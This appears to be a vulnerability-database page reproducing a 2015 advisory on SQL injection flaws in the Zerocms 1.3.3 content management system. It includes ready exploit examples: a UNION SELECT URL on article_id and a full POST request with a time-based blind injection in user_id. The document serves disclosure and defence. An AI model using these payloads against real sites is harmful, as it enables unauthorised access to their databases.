Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Zerocms v.1.3.3 SQL Injection Vulnerability

🗓️ 01 Feb 2015 00:00:00Reported by Steffen RösemannType 
zdt
 zdt🔗 0day.today👁 19 Views

Zerocms v.1.3.3 SQL injection vulnerability affects zero_view_article.php and zero_user_transact.ph

Code
Zerocms <= v.1.3.3 SQL injection vulnerability
Affected Software: zerocms <= v.1.3.3 (released 23rd-Jan-2015)
Vendor URL: http://aas9.in/zerocms/
Vendor Status: platform will be moving to Rails4

==========================
Vulnerability Description:
==========================

Content management system Zerocms v. 1.3.3 suffers from SQL injection
vulnerabilities.

==================
Technical Details:
==================

The article_id-parameter used in zero_view_article.php is vulnerable to SQL
injection. It is located here in a common Zerocms-installation and can be
exploited even by unregistered users:

http://{TARGET}/views/zero_view_article.php?article_id=1

Exploit-Example:

http://
{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

A Blind SQL injection vulnerability can be found the file
zero_user_transact.php. The parameter user_id is vulnerable to SQL
injection. See the following example POST-request which serves as
exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 AND
SLEEP(30)&action=Modify+Account

The Blind SQL injection vulnerability can be exploited on the
administrative backend of Zerocms.

The vulnerabilities described above have been tested on the following
versions of Zerocms:

- v. 1.3.2
- v. 1.3.3

=========
Solution:
=========

Vendor seems not to provide a patch for this vulnerabilities as version
1.3.3 is the last release for this PHP-based platform. It will be developed
on the Rails4-platform in future releases (see Github repository, release
section).

#  0day.today [2018-04-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Feb 2015 00:00Current
7.1High risk
Vulners AI Score7.1
zerocmssql injectionphp-based platformrails4vulnerability1.3.323rd-jan-2015github repository
19